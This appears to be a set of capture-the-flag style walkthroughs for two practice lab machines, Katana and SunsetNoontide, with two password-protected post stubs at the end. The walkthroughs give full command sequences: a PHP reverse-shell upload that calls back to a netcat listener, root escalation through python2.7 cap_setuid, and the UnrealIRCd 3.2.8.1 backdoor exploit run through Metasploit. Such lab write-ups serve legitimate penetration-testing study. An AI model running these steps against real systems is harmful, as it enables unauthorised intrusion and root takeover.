pg-katana-play

Exploitation Guide for Katana

Summary

This machine is exploited by a file upload vulnerability in a web application. It is escalated by exploiting a misconfigured Linux file capability in the python2.7 binary.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p- 192.168.120.154
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 11:33 EDT
Nmap scan report for 192.168.120.154
Host is up (0.030s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown

Dirb

Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb http://192.168.120.155:8088 -X .html -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 20 14:05:14 2020
URL_BASE: http://192.168.120.155:8088/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.120.155:8088/ ----
+ http://192.168.120.155:8088/error404.html (CODE:200|SIZE:195)                                                
+ http://192.168.120.155:8088/index.html (CODE:200|SIZE:655)                                                   
+ http://192.168.120.155:8088/upload.html (CODE:200|SIZE:6480)                                                 
                                                                                                               
-----------------
END_TIME: Thu Aug 20 14:07:40 2020
DOWNLOADED: 4612 - FOUND: 3

Exploitation

File Upload Vulnerability

Navigating to http://192.168.120.155:8088/upload.html, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php
...
/usr/share/webshells/php/php-reverse-shell.php
...
kali@kali:~$

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guess work and the above message, we can trigger the reverse shell by navigating to http://192.168.120.155:8715/katana_php-reverse-shell.php:

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.155: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.155] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@katana:/$

Escalation

Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see file capability with +ep permission is set on python2.7:

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
www-data@katana:~$

Linux file capabilities are maintained by the kernel. This concept is similar to how SUID functions. Linux’s thread privilege checking is based on capabilities. Capabilities work by breaking the actions normally reserved for root down into smaller portions. The file capability sets are stored in an extended attribute named security.capability.

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
whoami
www-data
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami
whoami
root
root@katana:~# 

.

unatended way : bruteforce ssh, and find katana /root

pg-sunsetnoontide-play

Exploitation Guide for SunsetNoontide
Summary

This machine is exploited via a remote code execution vulnerability in the Unreal IRC server v3.2.8.1. It is then escalated by a very simple password for the root user.
Enumeration
Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap 192.168.187.120 
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 11:30 EST
Nmap scan report for 192.168.120.228
Host is up (0.035s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
6667/tcp open irc

IRC

This scan shows a potential IRC server running on port 6667.
Let’s connect to this IRC server to see if we can gather more information.
We’ll use irssi here but any other IRC client will do.

kali@kali:~$ irssi

[(status)] /server connect 192.168.187.120

11:11 -!- Irssi: Looking up 192.168.187.120
11:11 -!- Irssi: Connecting to 192.168.187.120 [192.168.120.165] port 6667
11:11 -!- Irssi: Connection to 192.168.187.120 established
11:11 !irc.foonet.com *** Looking up your hostname...
11:11 !irc.foonet.com *** Couldn't resolve your hostname; using your IP address instead
11:11 -!- You have not registered
11:11 -!- Welcome to the ROXnet IRC Network kali!kali@192.168.118.9
11:11 -!- Your host is irc.foonet.com, running version Unreal3.2.8.1
11:11 -!- This server was created Sat 08 Aug EDT at 2020 07:03:52 PM
11:11 -!- irc.foonet.com Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
11:11 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
11:11 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=~&@%+ are supported by this server
11:11 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
11:11 -!- There are 1 users and 0 invisible on 1 servers
11:11 -!- I have 1 clients and 0 servers
11:11 -!- Current Local Users: 1 Max: 1
11:11 -!- Current Global Users: 1 Max: 1
11:11 -!- MOTD File is missing
11:11 -!- Mode change [+iwx] for user kali`

We see that the IRC server is Unreal version 3.2.8.1
Exploitation
Remote Code Execution

Looking up exploits for this version, we find that it is vulnerable to remote code execution:

kali@kali:~$ searchsploit “3.2.8.1”

Exploit Title | Path

UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 – Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 – Remote Downloader/Execute | linux/remote/13853.pl
—————————————————————————————————————————————————— ———————————

We can use the Metasploit framework module unix/irc/unreal_ircd_3281_backdoor and the payload cmd/unix/reverse_perl to achieve RCE:

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.187.120  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 cmd/unix/generic normal No Unix Command, Generic Command Execution
5 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 0
payload => cmd/unix/bind_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 192.168.187.120:6667 - Connected to 192.168.187.120:6667...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.187.120:6667 - Sending backdoor command...
[*] Started bind TCP handler against 192.168.187.120:4444
id
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.187.120:4444) at 2021-09-09 11:23:30 -0400

uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
cd /home
su root
root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux noontide 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
hostname
noontide

.

Protected: pg-dawn2-play

This content is password protected. To view it please enter your password below:

Posted on

Protected: pg-muddy-private

This content is password protected. To view it please enter your password below:

Posted on